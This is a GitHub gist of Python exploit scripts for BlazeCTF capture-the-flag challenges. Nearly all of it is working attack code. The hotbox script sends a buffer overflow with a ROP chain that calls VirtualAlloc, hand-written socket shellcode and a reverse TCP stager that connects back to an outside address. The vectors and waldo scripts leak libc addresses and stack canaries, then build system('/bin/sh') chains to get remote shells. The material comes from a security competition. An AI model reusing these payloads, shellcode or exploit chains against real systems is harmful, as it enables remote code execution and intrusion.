Skip to content

Instantly share code, notes, and snippets.

@Jinmo

Jinmo/gong-fu semi auto.py

Last active June 5, 2018 05:44
Show Gist options
  • Save Jinmo/2422626e891a4ebb97ec92200d8469c7 to your computer and use it in GitHub Desktop.
Save Jinmo/2422626e891a4ebb97ec92200d8469c7 to your computer and use it in GitHub Desktop.
Download ZIP
blazectf exploits (still uploading)
Raw
gong-fu semi auto.py
# spectogram
s = '''1100110101100111111111011101111111011110110010001
0011001010011111111000100010000000100001001101111
1010001000110000101011101011101011110101111110111
0100010001010010101111011101100110001100000000111
1000111100000010010010111010111111010110100000011
0010100100110100101011011001110111000110010110110
0010000101100001011111001000101011100100101101001'''.split('\n')
print ''.join([chr(int(''.join([s[j][i] for j in range(7)]),2)) for i in range(len(s[0]))])
print len(s[0])
Raw
hotbox.py
import struct
import socket
import time
import hexdump
from pwn import *
p32 = lambda x: struct.pack("<L", x)
u32 = lambda x: struct.unpack("<L", x)[0]
HOST, PORT = '192.168.137.153', 42069
HOST, PORT = 'hotbox.420blaze.in', 42071
go = lambda: socket.create_connection((HOST, PORT))
h = 0x1b0
for i in range(16):
sc = go()
sc.send('a' * 0xc4 + p32(0) + p32(0x40176a))
time.sleep(0.3)
sc = go()
sc.send('a' * 0xc4 + p32(0) + p32(0x40152f) * 3 + p32(0x4016d0))
sp = u32(sc.recv(4))
print hex(sp)
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x77bb208a, # POP ECX # RETN [msvcrt.dll]
0x77ba1100, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x0040528a, # MOV EAX,DWORD PTR DS:[ECX] # RETN [blazectf-1.exe]
0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
0x004058cd, # POP EBP # RETN [blazectf-1.exe]
0x77eb4303, # & call esp [kernel32.dll]
0x77bd7031, # POP EBX # RETN [msvcrt.dll]
0x00000001, # 0x00000001-> ebx
0x0040f913, # POP EDX # RETN [blazectf-1.exe]
0x00001000, # 0x00001000-> edx
0x77bbdee3, # POP ECX # RETN [msvcrt.dll]
0x00000040, # 0x00000040-> ecx
0x0040584b, # POP EDI # RETN [blazectf-1.exe]
0x77bda010, # RETN (ROP NOP) [msvcrt.dll]
0x77bc5d88, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x7c82e243, # PUSHAD # RETN [ntdll.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
time.sleep(2)
sc = go()
shcode = asm(
'''
sub esp, 0x800
mov eax, [0x411108]
push esp
push 0x202
call eax
mov eax, [0x411128]
push 0
push 1
push 2
call eax
mov edi, eax
mov esi, esp
add esp, 0x100
push 0
push 0
push 0
push 0x55a40002
mov ebp, esp
mov esp, esi
push 0x10
push ebp
push edi
mov eax, [0x411114]
call eax
push 5
push edi
mov eax, [0x41111c]
call eax
push ebp
add dword ptr [esp], -4
mov dword ptr [ebp-4], 16
push ebp
push edi
mov eax, [0x411110]
call eax
mov edi, eax
push 0
push 0x100
push ebp
push edi
mov eax, [0x411124]
call eax
'''
)
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\x0d\xe6\xbc\x50\x68\x02"
buf += "\x00\x7a\x69\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += "\x53\xff\xd5"
sc.send('a' * 0xc4 + p32(0) + rop_chain + shcode + buf)
time.sleep(1)
while True:
sc = go()
print `sc.recv(0x100)`
print 'yey.'
exit()
try:
leak = sc.recv(0x100)
if leak:
exit()
except:
pass
sc.close()
print hex(sp)
print hex(h)
hexdump.hexdump(leak)
Raw
magic-re.py
from capstone import *
import struct
regs = 'ESP, EAX, ECX, EDX, EBX, WHAT, EBP, ESI, EDI'.split(', ')[::-1]
strings = ['AAAAaaaaCAAA q31EAAAFAAAGAAAHAAATu31', 'baaacaaadaaaeaaafaaagaaahaaa\x00\x00\x00baaaa', 'baaaaaaaCAAA q31EAAAFAAAGAAAHAAAXu31', 'caaadaaaeaaafaaagaaahaaa\x00\x00\x00baaacaaaC', 'baaacaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaacaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaabaaaCAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'aaaabaaaDAAA q31EAAAFAAAGAAAHAAA\\u31', 'daaaeaaafaaagaaahaaa\x00\x00\x00aaaacaaaCAAA ', 'daaabaaaDAAA q31EAAAFAAAGAAAHAAA`u31', 'eaaafaaagaaahaaa\x00\x00\x00daaabaaaDAAA q31E', 'daaabaaaDAAA q31EAAAGAAAGAAAHAAA`u31', 'eaaafaaagaaahaaa\x00\x00\x00daaabaaaDAAA q31E', 'daaabaaaDAAA q31EAAAGAAAeaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'daaabaaaDAAA q31EAAAGAAAeaaaHAAA`u31', 'du31faaagaaahaaa\x00\x00\x00daaabaaaEAAA q31E', 'daaabaaaEAAA q31EAAAGAAAeaaaHAAA`u31', 'du31faaagaaahaaa\x00\x00\x00daaabaaaEAAA q31E', 'du31baaaEAAA q31EAAAGAAAeaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31baaaEAAA q31EAAAGAAAdaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAAdu31', 'faaagaaahaaa\x00\x00\x00daaabaaaDAAA q31EAAAG', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAA`u31', 'EAAAfaaagaaahaaa\x00\x00\x00du31aaaaEAAA q31E', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAA\\u31', '`u31EAAAfaaagaaahaaa\x00\x00\x00du31aaaaEAAA ', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAAXu31', 'GAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31aaaaE', 'du31aaaaEAAA q31EAAAGAAAdaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'du31aaaaEAAA q31FAAAGAAAdaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'du31aaaaEAAA q31FAAAGAAAdaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'du31aaaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'cu31aaaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'cu31`aaaEAAA q31FAAAGAAAcaaaHAAAPu31', 'Tu31EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00\x00', 'Tu31`aaaEAAA q31FAAAGAAAcaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'Tu31aaaaEAAA q31FAAAGAAAcaaaHAAATu31', 'EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00\x00du31a', 'Tu31aaaaEAAA q31FAAAGAAAcaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', 'Tu31aaaaEAAA q31FAAAGAAAdaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', 'Uu31aaaaEAAA q31FAAAGAAAdaaaHAAASu31', '1EAAAGAAA`u31EAAAfaaagaaahaaa\x00\x00Tu31a', '1EAAaaaaEAAA q31FAAAGAAAdaaaHAAAWu31', 'AGAAA`u31EAAAfaaagaaahaaa\x00\x001EAAaaaaE', '1EAAaaaaEAAA q31FAAAGAAAcaaaHAAAWu31', 'AGAAA`u31EAAAfaaagaaahaaa\x00\x001EAAaaaaE', '1EAAaaaaEAAA q31FAAAAGAAcaaaHAAA[u31', 'A`u31EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA ', 'A`u3aaaaEAAA q31FAAAAGAAcaaaHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAcaaaHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAcaaaHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAAZu31', 'GAAA31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA ', 'A`u3aaaaEAAA q31GAAAAGAAdaaaHAAAVu31', 'GAAAGAAA31EAAAfaaagaaahaaa\x00A`u3aaaaE', 'A`u3aaaaEAAA q31GAAAAGAAGAAAHAAAZu31', 'GAAA31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA ', 'GAAAaaaaEAAA q31GAAAAGAAGAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAAaaaaEAAA q31GAAAAGAAHAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAA`aaaEAAA q31GAAAAGAAHAAAHAAA^u31', '31EAAAfaaagaaahaaa\x00A`u3aaaaEAAA q31G', 'GAAA`aaaEAAA q31GAAAAGAAHAAAHAAA_u31', '1EAAAfaaagaaahaaa\x00\x00A`u3aaaaEAAA q31G', '1EAA`aaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', '1EAAaaaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', '1EAAaaaaEAAA q31GAAAAGAAHAAAHAAA_u31', 'EAAAAfaaagaaahaaa\x00\x001EAA`aaaEAAA q31G', '1EAA`aaaEAAA q31GAAAAGAAHAAAHAAA_u31', 'EAAAAfaaagaaahaaa\x00\x001EAA`aaaEAAA q31G', 'EAAA`aaaEAAA q31GAAAAGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', 'EAAA`aaaEAAA q31GAAABGAAHAAAHAAAcu31', 'Afaaagaaahaaa\x00\x001EAAaaaaEAAA q31GAAAA', 'EAAA`aaaAfaa q31GAAABGAAHAAAHAAAgu31', 'agaaahaaa\x00%255s\x00A problem with mmap ']
def to_regs(x):
x = struct.unpack("<9L", x)
y = {}
for reg, value in zip(regs, x):
y[reg] = value
return y
cs = Cs(CS_ARCH_X86, CS_MODE_32)
for i in range(64, 96):
dis = cs.disasm(chr(i) * 100, 0x3133700c).next()
print dis.mnemonic + ' ' + dis.op_str, '/',
print 'end'
def diff(x, y, prevStack, stack):
X = x
Y = y
diffs = {}
for a in y:
if y[a] != x[a]:
# print a, '%08x'%x[a], '->', '%08x'%y[a]
diffs[a] = x[a], y[a]
if len(diffs.keys()) == 1 and diffs.keys()[0] in regs:
x, y = diffs.values()[0]
if abs(x-y) == 1:
print {-1: 'dec', 1: 'inc'}[y - x] + ' ' + diffs.keys()[0]
elif abs(x-y) == 4:
if x > y:
print 'PUSH',
#print `prevStack`
#print `stack`
found = 0
for a, b in X.items():
if b == struct.unpack("<L", stack[:4])[0]:
print a,
found = 1
if found == 0:
print '?'
print
else:
print 'POP EAX'
else:
print 'wtf'
exit()
elif 'ESP' in diffs:
assert x['ESP'] + 4 == y['ESP']
print 'pop', filter(lambda x: x != 'ESP', diffs.keys())
else:
print 'INC EAX'
prev = initial = to_regs("AAAABAAACAAADAAAEAAAFAAAGAAAHAAAPu31")
base = initial['ESP']
print '%x' % initial['ESP']
prevStack = "aaaabaaacaaadaaaeaaafaaagaaahaaa"
for i in range(0, len(strings), 2):
cur = to_regs(strings[i])
stack = strings[i+1]
diff(prev, cur, prevStack, stack)
prev = cur
prevStack = stack
# print '-' * 80
Raw
vectors.py
from pwn import *
HOST, PORT = "vectors.420blaze.in", "420"
# HOST, PORT = "192.168.137.154", 31337
libc = ELF('/=/Downloads2/_libc.so.6')
class V(object):
def __init__(self):
self.r = remote(HOST, PORT)
self.menu = lambda: self.r.recvuntil("> ")
self.prompt = lambda: self.r.recvuntil('? ')
self.ii = lambda x: self.r.sendline(str(x))
self.verbose = True
def push(self, vec, value):
self.ii('push')
self.ii(vec)
self.ii(value)
self.menu()
self.prompt()
self.prompt()
self.update_address()
def write(self, vec, index, value):
self.ii('write')
self.ii(vec)
self.ii(index)
self.ii(value)
self.menu()
self.prompt()
self.menu()
self.prompt()
self.update_address()
def read(self, vec, index):
self.ii('read')
self.ii(vec)
self.ii(index)
self.menu()
self.prompt()
self.menu()
self.r.recvuntil(' == ')
result = int(self.r.recvline())
self.update_address()
return result
def update_address(self):
lines = self.r.recvuntil('\nread', drop=True).strip().split('\n')
if self.verbose:
print '\n'.join(lines)
lines = [eval(x) for x in lines]
self.entries = lines
r1 = V()
r2 = V()
r1.push(0, 0)
time.sleep(1)
r2.ii('write')
r2.ii('0')
r2.ii('0')
r2.menu()
r2.prompt()
r2.menu()
r2.prompt()
# r2.r.interactive()
# then wait
for i in range(32):
r1.push(0, 0)
base = r1.entries[1][0] - 0x120
r2.ii(base)
ld = base - 0x21f000
r1.verbose = False
@MemLeak
def leak(x):
if x % 8:
return
idx = (x - base) / 8
idx &= 2 ** 64 - 1
return p64(r1.read(0, idx))
# r2.ii(0x41414141)
r1.write(0, 0, 2**64-1)
assert r1.entries[0][1] == 2 ** 64 - 1
r2.r.close()
pause()
libc.address = base - 0xe28000
stack = leak.q(libc.symbols['__environ'])
vs = []
while True:
v = leak.q(stack)
vs.append(v)
if len(vs) >= 3:
if vs[-1] & 0xfff == 0xba3 and vs[-3] & 0xfff == 0xed8:
print hex(stack)
break
stack -= 8
x = stack
rop = [
libc.search('\x5f\xc3').next(),
libc.search('/bin/sh\x00').next(),
libc.symbols['system']
]
for i in range(len(rop)):
idx = (x - base) / 8
x += 8
r1.write(0, idx, rop[i])
r1.ii('yo')
r1.r.interactive()
Raw
waldo.py
from pwn import *
import textwrap
import ctypes
libc = ctypes.CDLL('libc.so.6')
HOST, PORT = "waldo.420blaze.in", "420"
# HOST, PORT = "0.0.0.0", 31337
r = remote(HOST, PORT)
menu = lambda: r.recvuntil("? ")
ii = lambda x: r.sendline(str(x))
def genwaldo():
pos = libc.rand() % 17
w = 2 * (pos + 8)
h = pos + 8
pos = libc.rand() % (w * h)
return pos / w, pos % w
canary = None
def recvwaldo(recv=False):
global canary, stack, base
r.recvline()
data = r.recvuntil('\nWaldo\'s found', drop=True)
for i in range(8, 100):
lines = data[i::i+1]
if lines.strip('\n') == '':
break
width = i
realdata = ''
for i in range(len(data) / width):
realdata += data[(width+1)*i:][:width]
pos = realdata.find('W')
if recv:
realdata = realdata[0:][:32]
canary = realdata[8:16]
stack = u64(realdata[16:24])
base = u64(realdata[24:32]) - 0xc43
print hex(base)
print canary.encode('hex')
print `realdata`
return width
menu()
ii('y')
libc.srand(libc.time(0))
print recvwaldo()
genwaldo()
ii('a')
cnt = 2000
# cnt = 0
menu()
ii('y' + 'a' * cnt)
menu()
recvwaldo(True)
a, b = genwaldo()
ii(a)
ii(b)
for i in range(31):
a, b = genwaldo()
ii(a)
ii(b)
r.recvuntil('name:')
poprdi = base + 0x1113
stack += 0x100
framesize = 0x400
def leak(addr):
global stack
if '\n' in p64(addr):
return
payload = '\x00'.rjust(72, '\x00') + canary + p64(stack + 0x100) + p64(poprdi) + p64(addr) + p64(base + 0x998) + p64(poprdi) + p64(base + 0x12b0) + p64(base + 0x998) + p64(base + 0x1056)
stack -= framesize
ii(payload)
r.recvuntil('Congratz !\n')
data = r.recvuntil('\nTop score', drop=True) + '\x00'
print `data`
return data
d = DynELF(leak, base, elf=ELF('waldo'))
system = d.lookup('system', 'libc')
print hex(system)
payload = 'sh # '.rjust(72) + canary + p64(stack) + p64(poprdi) + p64(stack + framesize + 0x4a0 - 0x380) + p64(system) + 'sh\x00'
ii(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment